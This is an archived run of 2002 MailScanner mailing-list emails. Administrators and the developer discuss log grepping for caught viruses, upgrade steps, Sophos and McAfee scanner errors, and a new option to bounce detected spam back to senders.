<5.1.0.14.2.20020910091813.0526fb68@imap.ecs.soton.ac.uk> Try reading "man fgrep". fgrep '>>>' will do what you want. At 21:33 09/09/2002, you wrote: >I would like to see some differant text in the log per email virus >caught.. I grep the maillog to see how many viruses caught so far that >week. For instance, I currently tried 'tail -2000 /var/log/maillog | >grep >>>Virus' of course the ">" symbols something that messes grep up and >wont work. The only string that works best is just use the word Virus ( >tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the >mailscanner restarting every four hours lines as well as the viruses >caught. I cant think of anything good but maybe some weird character that >is never seen in the maillog such as a & or pipe symbol? Just something >that grep could sniff out easily ONLY for caught viruses. Or do you have a >better solution? The Email ID to go along with it as well would be nice. >for ones that were scanned and ones that were found to be infected. >Hope that is a ok suggestion.. >Oh well Im still a newbie anyways 8-) > > >Matt Doherty >IT Dept >Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< >-----Original Message----- >From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] >Sent: Monday, September 09, 2002 5:14 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: New release logging suggestions > >The new release is getting there... > >What logging would people like to see? >Anything particular that you want logged? > >Suggestions please. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton >Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020910/3d0f4c48/attachment.html From mailscanner at ecs.soton.ac.uk Tue Sep 10 09:19:59 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: domains Not to scan In-Reply-To: <5.1.0.14.2.20020910091841.03762080@192.168.0.88> References: <004f01c2583e$1007d2c0$1c0b879e@SHSU.EDU> <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020910091930.02e2ca20@imap.ecs.soton.ac.uk> At 22:22 09/09/2002, you wrote: >Hi maybe this is a feature request or a mod to the domains to scan > >I would like to do it the other way around eg all domains are scanned >unless they are excluded >However it would be easier to have an exclude this domain option than and >include option >as with the include option you need to fill in all domains and there are many This will be in the next major release. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 10 09:20:54 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: Signature for outgoing messages In-Reply-To: <003601c2587b$9e34d740$01000001@mohans> References: <5.1.0.14.2.20020907163618.039fde98@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020910092046.04e851f8@imap.ecs.soton.ac.uk> This will be in the next major release. At 04:39 10/09/2002, you wrote: >An extension like what I saw in another webmail software. Can each >domain have a specific configuration file in the etc directory called >.mailscanner.conf? Thus we will be able to use different >scanners for different domains, switch on or off spam detection etc. >This will help optimise load on the machine by only implementing >features required for each domain. This will be useful for multi-domain >servers only - I guess many of run multi-domain servers. > >Mohan > > >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Saturday, September 07, 2002 9:09 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Signature for outgoing messages > > >At 14:18 07/09/2002, you wrote: > >You rock too hard for your own good! :) > >I must admit, I'm starting to look forward to having a day/evening off! > >The new version (almost completely re-written), currently stands at >6,900 lines and I'm not finished yet... > > >-----Original Message----- > >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > >Behalf Of Julian Field > >Sent: Saturday, September 07, 2002 8:15 AM > >To: MAILSCANNER@JISCMAIL.AC.UK > >Subject: Re: Signature for outgoing messages > > > > > >At 14:07 07/09/2002, you wrote: > > >To expand on that, would it be possible to have the signing by > > >sending domain? > > > >Yes, definitely. You will be able to choose the signature in a whole > >variety of different ways. > > > > >-----Original Message----- > > >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > > >Behalf Of Julian Field > > >Sent: Saturday, September 07, 2002 3:50 AM > > >To: MAILSCANNER@JISCMAIL.AC.UK > > >Subject: Re: Signature for outgoing messages > > > > > > > > >At 07:52 07/09/2002, you wrote: > > > >The sign all messages signs all messages local or external. Is it > > > >possible for me to enable sign only for messages going to external > > > >domains? > > > > > >This is another feature that will be in the next major release. It's > > >coming on very well at the moment, but is still a few weeks away from > > > >release. > > >-- > > >Julian Field Teaching Systems Manager > > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > >Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From henrik at LEWANDER.COM Tue Sep 10 10:17:24 2002 From: henrik at LEWANDER.COM (Henrik Lewander) Date: Thu Jan 12 21:15:32 2006 Subject: Empty SA reports again References: <5.1.0.14.2.20020910090602.052861a0@imap.ecs.soton.ac.uk> Message-ID: <001b01c258aa$e1e43830$05c6a8c0@gbg.bluelabs.se> Julian Field wrote: > Is there accompanying maillog output? > It's possible that SpamAssassin timed out at just the wrong moment. That seems to be the case, yes: "mailscanner[10671]: SpamAssassin timed out and was killed, consecutive failure 1 of 10" I was under the impression that this shouldn't leave an empty report anyhow? I will up the timeout for now. Regards, Henrik From P.G.M.Peters at civ.utwente.nl Tue Sep 10 10:20:35 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions In-Reply-To: References: Message-ID: On Mon, 9 Sep 2002 16:33:52 -0400, you wrote: >I would like to see some differant text in the log per email virus caught.. >I grep the maillog to see how many viruses caught so far that week. For >instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of >course the ">" symbols something that messes grep up and wont work. The only >string that works best is just use the word Virus ( tail -2000 >/var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner >restarting every four hours lines as well as the viruses caught. I usually have a number of "grep -v"'s follow the first grep to shift out unwanted lines. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From fsurget at AUUOOH.COM Tue Sep 10 11:26:42 2002 From: fsurget at AUUOOH.COM (Frank S. at Fort Myers Beach, Fl.) Date: Thu Jan 12 21:15:32 2006 Subject: ANNOUNCE: 3.22-13 released References: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> Message-ID: <3D7DC8E2.000001.03808@server> Hi Julian, I'm new to the list and to MailScanner. Thanks for the program. I just recently installed MailScanner (about a week ago). Are there any upgrading instructions? I did'nt see any on your site. One other question. I'm running a Cobalt Raq4. It all looks like it installed successfully. The only other potential problem I've had is e-mail being sent through a PHP mail form multiple times. Have you run into this problem before? Thanks again, Frank From mailscanner at ecs.soton.ac.uk Tue Sep 10 11:59:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: ANNOUNCE: 3.22-13 released In-Reply-To: <3D7DC8E2.000001.03808@server> References: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> At 11:26 10/09/2002, you wrote: >Hi Julian, >I'm new to the list and to MailScanner. Thanks for the program. >I just recently installed MailScanner (about a week ago). Are there any >upgrading instructions? I did'nt see any on your site. Save a copy of your mailscanner.conf somewhere safe. rpm -Uvh mailscanner-3.22-13.i386.rpm Go through the new mailscanner.conf file, adding the customisations you had in your old one. You probably don't want to just over-write the new one with your old one unless you can be sure that no new configuration options have been added since you last upgraded. Furthermore, there are some Raq4 instructions on the net written by some of my users. Go a google search for "raqfaq" and "cobalt" and you should find them. >One other question. I'm running a Cobalt Raq4. It all looks like it >installed successfully. The only other potential problem I've had is e-mail >being sent through a PHP mail form multiple times. Have you run into this >problem before? You sure it's not caused by people double-clicking on the "submit" button in the form? Very common problem. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From fsurget at AUUOOH.COM Tue Sep 10 13:44:19 2002 From: fsurget at AUUOOH.COM (Frank S. at Fort Myers Beach, Fl.) Date: Thu Jan 12 21:15:32 2006 Subject: ANNOUNCE: 3.22-13 released References: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> Message-ID: <3D7DE923.000003.02508@server> >One other question. I'm running a Cobalt Raq4. It all looks like it >installed successfully. The only other potential problem I've had is e-mail >being sent through a PHP mail form multiple times. Have you run into this >problem before? I thought of that too, but a couple of messages showed up 11 times. Pretty hard to click that many times... Probably an issue elsewhere, Thanks for your help. Frank From Matthew_doherty at DATAWATCH.COM Tue Sep 10 14:06:20 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:33 2006 Subject: New release logging suggestions Message-ID: Thanks! Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Jonas Bardino [mailto:jonas@ODENSE.KOLLEGIENET.DK] Sent: Monday, September 09, 2002 6:13 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: New release logging suggestions Matt Doherty wrote: > I would like to see some differant text in the log per email virus > caught.. I grep the maillog to see how many viruses caught so far that > week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string > that works best is just use the word Virus ( tail -2000 /var/log/maillog > | grep Virus ) Only thing is, it shows the mailscanner restarting every > four hours lines as well as the viruses caught. I cant think of anything > good but maybe some weird character that is never seen in the maillog > such as a & or pipe symbol? Just something that grep could sniff out > easily ONLY for caught viruses. Or do you have a better solution? The > Email ID to go along with it as well would be nice. for ones that were > scanned and ones that were found to be infected. > Hope that is a ok suggestion.. > Oh well Im still a newbie anyways 8-) > > > Matt Doherty Hi Matt Are you looking for something like: 'tail -2000 /var/log/maillog | grep ">>>Virus"' ? (if you enclose the expression in doublequotes the ">"'s won't be treated as redirects). Regards, Jonas -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020910/98fa3602/attachment.html From LISTSERV at JISCMAIL.AC.UK Tue Sep 10 14:30:48 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: francis@CROSSEN.ORG requested to join Message-ID: <200209101330.OAA00206@magpie.ecs.soton.ac.uk> Tue, 10 Sep 2002 14:30:48 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Francis Crossen . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER francis@CROSSEN.ORG Francis Crossen The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+francis%40CROSSEN.ORG+Francis+Crossen&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Tue, 10 Sep 2002 14:30:48 +0100 Received: from saffron.via-net-works.ie (saffron.via-net-works.ie [212.17.32.24]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8ADUkr16183 for ; Tue, 10 Sep 2002 14:30:46 +0100 Received: from pavlova.dialups.via-net-works.ie ([212.17.34.167] helo=athlon2000) by saffron.via-net-works.ie with esmtp (Exim 3.20 #1) id 17ol6K-0008BZ-00 for LISTSERV@JISCMAIL.AC.UK; Tue, 10 Sep 2002 14:30:44 +0100 From: "Francis Crossen" To: "L-Soft list server at JISCMAIL (1.8e)" Date: Mon, 9 Sep 2002 14:32:34 +0100 MIME-Version: 1.0 Subject: Re: Command confirmation request (587B1EEF) Message-ID: <3D7CB102.25433.9B0707@localhost> X-Confirm-Reading-To: "Francis Crossen" X-pmrqc: 1 Return-receipt-to: "Francis Crossen" Priority: normal In-reply-to: <200209101329.g8ADTMG23888@sylvie.dse.ie> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body From Matthew_doherty at DATAWATCH.COM Tue Sep 10 15:27:33 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:33 2006 Subject: you previously stated a fix for the "Sophos update error on line 77" failure. And its still reporting it Message-ID: Julian, I have done what you previously stated about Sophos update line 77 failure. And its still reporting it[Matt Doherty] . I deleted everything Except for the /bin/ directory under /usr/local/Sophos I had already d ownloaded the new lib6.~.Z file from Sophos. From mdchaney at MICHAELCHANEY.COM Tue Sep 10 15:41:23 2002 From: mdchaney at MICHAELCHANEY.COM (Michael Chaney) Date: Thu Jan 12 21:15:33 2006 Subject: Skilled spammers In-Reply-To: <200209071035.g87AZHr24725@ori.rl.ac.uk>; from x.mailscanner.mail@MELLONI.COM on Sat, Sep 07, 2002 at 11:35:17AM +0100 References: <200209071035.g87AZHr24725@ori.rl.ac.uk> Message-ID: <20020910094123.A32050@michaelchaney.com> On Sat, Sep 07, 2002 at 11:35:17AM +0100, Bruno Melloni wrote: > I use the default RBLs (free) that come with MailScanner and SpamAssassin. I am an individual > and cannot afford to pay for RBL access. Anyway, I have managed to stop them through creative > blacklisting, my question was about improving the two base tools - they are quite good as they are > (stop 95% of my spam) and would be nice to make them even better so that people won't need to > relay on yet more components. Something that cannot be stressed enough is that we all need to call (note: CALL) the ISP's that are providing service to these large spam organizations and let them know it's not appreciated. A couple of talking points: 1. The spammer is blacklisted, meaning the ISP *should* know that they're a spammer given that the rest of the world knows 2. Is spamming illegal in your state? 3. Would you let me spam? They why do you allow them to? I usually call the ISP, either the NOC or the sales department. If it's the NOC, I ask them to shut down a known spammer. If I call the sales department, I start out with "I'd like to get a [DSL line or whatever] so I can send spam." They balk at that, giving me the chance to segue into "well, you don't seem to have trouble letting [whoever] send spam". That gets someone's attention. If they get bothered enough, the spammer will have to move at some point. Use ARIN to get the NOC's number. Michael -- Michael Darrin Chaney mdchaney@michaelchaney.com http://www.michaelchaney.com/ From Matthew_doherty at DATAWATCH.COM Tue Sep 10 15:50:11 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:33 2006 Subject: you previously stated a fix for the "Sophos update error on line 77" failure. And its still reporting it Message-ID: Thanks! That did it! 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Tuesday, September 10, 2002 11:43 AM To: Matt Doherty Subject: you previously stated a fix for the "Sophos update error on line 77" failure. And its still reporting it Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] Sent: Tuesday, September 10, 2002 11:43 AM To: Matt Doherty Subject: you previously stated a fix for the "Sophos update error on line 77" failure. And its still reporting it check - $VDLDir = "../lib"; I had the same problem on RH7.3 problem was : $VDLDir = "/usr/local/Sophos/lib"; Julian, I have done what you previously stated about Sophos update line 77 failure. And its still reporting it[Matt Doherty] . I deleted everything Except for the /bin/ directory under /usr/local/Sophos I had already d ownloaded the new lib6.~.Z file from Sophos. >From the directory where i had downloaded it to I ran your script /usr/~/Sophos.install *.Z It ran and did do an update sucessfully. But when Cron runs Sophos.update or when I (as root) run it manually. We get the line 77 bs from /usr/~/autoupdate still However, After I ran the install IT DID update to the latest av files. But no more nightly updates still :( I am using MS version 3.20.8 with no problems except for the AV update. On RedHat 7.2 Thank You From hciss at HCIWS.COM Tue Sep 10 17:32:25 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions Message-ID: <00bc01c258e7$a8561a60$6401a8c0@matthew> Is there a way to reject/bounce instead of deliver/store/delete a message? It would be nice if it would make the return address or <> so it would not bounce back or go to the admin account either. That way the sender would know it had bounced. Also, is there a way to get mailscanner to run the ordb.org and/or bl.spamcop.net test on all the servers that were in the delivery chain? The headers would need to be parsed to do this I guess. Matt # Action to take when a message is detected as being spam: # deliver ==> Deliver it to the recipient # store ==> Move it to the quarantine # delete ==> Delete it completely # or else it can be a filename containing per-user and per-domain spam # actions. #Spam Action = /usr/local/MailScanner/etc/spam.actions.conf Spam Action = deliver From LISTSERV at JISCMAIL.AC.UK Tue Sep 10 19:48:21 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: felt@DRUGGIST.GG.CALTECH.EDU requested to join Message-ID: <200209101848.TAA09322@magpie.ecs.soton.ac.uk> Tue, 10 Sep 2002 19:48:21 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Dave Felt . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER felt@DRUGGIST.GG.CALTECH.EDU Dave Felt The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+felt%40DRUGGIST.GG.CALTECH.EDU+Dave+Felt&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From sevans at FOUNDATION.SDSU.EDU Tue Sep 10 20:22:13 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors Message-ID: <6214C3F9233D764C9E7029396C355015331478@mail.foundation.sdsu.edu> I've been testing out MailScanner on Redhat 7.3, I seem to get the following error when manually running Mcafee Virus Scanner. hdc: packet command error: status=0x51 { DriveReady SeekComplete Error } hdc: packet command error: error=0x54 ATAPI device hdc: Error: Illegal request -- (Sense key=0x05) Invalid field in command packet -- (asc=0x24, ascq=0x00) The failed "Start/Stop Unit" packet command was: "1b 00 00 00 03 00 00 00 00 00 00 00 " cdrom: open failed. hdc: packet command error: status=0x51 { DriveReady SeekComplete Error } hdc: packet command error: error=0x54 ATAPI device hdc: Error: Illegal request -- (Sense key=0x05) Invalid field in command packet -- (asc=0x24, ascq=0x00) The failed "Start/Stop Unit" packet command was: "1b 00 00 00 03 00 00 00 00 00 00 00 " cdrom: open failed. Same setup except Redhat 7.2 doesn't produce the same errors. Any ideas of what is going on? By the way as long as I'm off-topic here does anybody have a good redhat or general linux mailing list they'd tell me about. Steve Evans (619) 594-0653 From Denis.Beauchemin at USHERBROOKE.CA Tue Sep 10 20:30:24 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors In-Reply-To: <6214C3F9233D764C9E7029396C355015331478@mail.foundation.sdsu.edu> References: <6214C3F9233D764C9E7029396C355015331478@mail.foundation.sdsu.edu> Message-ID: <1031686224.8982.8.camel@dbeauchemin.si.usherb.ca> Steve, It looks like something is trying to access the CD drive. I doubt this is MailScanner or McAfee related... probably something in your XWindow setup or some process started at boot time. Denis On Tue, 2002-09-10 at 15:22, Steve Evans wrote: > I've been testing out MailScanner on Redhat 7.3, I seem to get the > following error when manually running Mcafee Virus Scanner. > > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error > } > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error > } > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > > Same setup except Redhat 7.2 doesn't produce the same errors. Any ideas > of what is going on? By the way as long as I'm off-topic here does > anybody have a good redhat or general linux mailing list they'd tell me > about. > > > Steve Evans > (619) 594-0653 > -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From raymond at PROLOCATION.NET Tue Sep 10 20:31:52 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors In-Reply-To: <6214C3F9233D764C9E7029396C355015331478@mail.foundation.sdsu.edu> Message-ID: Hi! > I've been testing out MailScanner on Redhat 7.3, I seem to get the > following error when manually running Mcafee Virus Scanner. Uh .... :) > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error > } > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error What about replacing your HDC with a less defective one ? Seems you have a problem with your hardware here. Most likely, a failling disk. Bye, Raymond. From raymond at PROLOCATION.NET Tue Sep 10 20:33:24 2002 From: raymond at PROLOCATION.NET (Raymond Dijkxhoorn) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors In-Reply-To: Message-ID: Hi! > > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error > > } > > hdc: packet command error: error=0x54 > > ATAPI device hdc: Sorry, ignore my last posting. > > cdrom: open failed. Bye, Raymond. From mailscanner at ecs.soton.ac.uk Tue Sep 10 20:36:12 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <00bc01c258e7$a8561a60$6401a8c0@matthew> Message-ID: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> I'll take a look, that would be a useful feature. I'll need to put the from into the to, and set the from to <>, then deliver the message. What should I put in the message? At 17:32 10/09/2002, you wrote: >Is there a way to reject/bounce instead of deliver/store/delete a message? >It would be nice if it would make the return address or <> so it >would not bounce back or go to the admin account either. That way the >sender would know it had bounced. > >Also, is there a way to get mailscanner to run the ordb.org and/or >bl.spamcop.net test on all the servers that were in the delivery chain? The >headers would need to be parsed to do this I guess. > >Matt > > ># Action to take when a message is detected as being spam: ># deliver ==> Deliver it to the recipient ># store ==> Move it to the quarantine ># delete ==> Delete it completely ># or else it can be a filename containing per-user and per-domain spam ># actions. >#Spam Action = /usr/local/MailScanner/etc/spam.actions.conf >Spam Action = deliver -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 10 20:38:59 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors In-Reply-To: <6214C3F9233D764C9E7029396C355015331478@mail.foundation.sds u.edu> Message-ID: <5.1.0.14.2.20020910203742.02225748@imap.ecs.soton.ac.uk> MailScanner adds the option --noboot to suppress these errors from McAfee. It's caused by McAfee trying to read the boot sector of a disk (cd) that isn't present. At 20:22 10/09/2002, you wrote: >I've been testing out MailScanner on Redhat 7.3, I seem to get the >following error when manually running Mcafee Virus Scanner. > > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error >} > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > hdc: packet command error: status=0x51 { DriveReady SeekComplete Error >} > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > >Same setup except Redhat 7.2 doesn't produce the same errors. Any ideas >of what is going on? By the way as long as I'm off-topic here does >anybody have a good redhat or general linux mailing list they'd tell me >about. > > >Steve Evans >(619) 594-0653 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Tue Sep 10 20:30:10 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:33 2006 Subject: MAILSCANNER: hzhu@MAIL.WESLEYAN.EDU left the list Message-ID: <200209101930.UAA13604@magpie.ecs.soton.ac.uk> Tue, 10 Sep 2002 20:30:10 Hong Zhu has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From sevans at FOUNDATION.SDSU.EDU Tue Sep 10 20:50:08 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:33 2006 Subject: Redhat 7.3 Errors Message-ID: <6214C3F9233D764C9E7029396C355015116B15@mail.foundation.sdsu.edu> Thanks. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Tuesday, September 10, 2002 12:39 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Redhat 7.3 Errors MailScanner adds the option --noboot to suppress these errors from McAfee. It's caused by McAfee trying to read the boot sector of a disk (cd) that isn't present. At 20:22 10/09/2002, you wrote: >I've been testing out MailScanner on Redhat 7.3, I seem to get the >following error when manually running Mcafee Virus Scanner. > > hdc: packet command error: status=0x51 { DriveReady SeekComplete >Error } > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > hdc: packet command error: status=0x51 { DriveReady SeekComplete >Error } > hdc: packet command error: error=0x54 > ATAPI device hdc: > Error: Illegal request -- (Sense key=0x05) > Invalid field in command packet -- (asc=0x24, ascq=0x00) > The failed "Start/Stop Unit" packet command was: > "1b 00 00 00 03 00 00 00 00 00 00 00 " > cdrom: open failed. > >Same setup except Redhat 7.2 doesn't produce the same errors. Any >ideas of what is going on? By the way as long as I'm off-topic here >does anybody have a good redhat or general linux mailing list they'd >tell me about. > > >Steve Evans >(619) 594-0653 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 10 21:35:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <00bc01c258e7$a8561a60$6401a8c0@matthew> Message-ID: <5.1.0.14.2.20020910213357.0236b898@imap.ecs.soton.ac.uk> I've just added a bit more to the spam handling code you can now "bounce" messages in addition to all the other things you can do. This will cause a (customizable) report message to be sent back to the sender of the message, with the envelope constructed so that the message will not bounce. At 17:32 10/09/2002, you wrote: >Is there a way to reject/bounce instead of deliver/store/delete a message? >It would be nice if it would make the return address or <> so it >would not bounce back or go to the admin account either. That way the >sender would know it had bounced. > >Also, is there a way to get mailscanner to run the ordb.org and/or >bl.spamcop.net test on all the servers that were in the delivery chain? The >headers would need to be parsed to do this I guess. > >Matt > > ># Action to take when a message is detected as being spam: ># deliver ==> Deliver it to the recipient ># store ==> Move it to the quarantine ># delete ==> Delete it completely ># or else it can be a filename containing per-user and per-domain spam ># actions. >#Spam Action = /usr/local/MailScanner/etc/spam.actions.conf >Spam Action = deliver -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Tue Sep 10 21:37:57 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:33 2006 Subject: Spam Actions In-Reply-To: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> Message-ID: <1031690279.2630.25.camel@wilowisp.dynetics.com> On Tue, 2002-09-10 at 14:36, Julian Field wrote: > I'll take a look, that would be a useful feature. > I'll need to put the from into the to, and set the from to <>, then deliver > the message. > What should I put in the message? > > At 17:32 10/09/2002, you wrote: > >Is there a way to reject/bounce instead of deliver/store/delete a message? > >It would be nice if it would make the return address or <> so it > >would not bounce back or go to the admin account either. That way the > >sender would know it had bounced. > > > 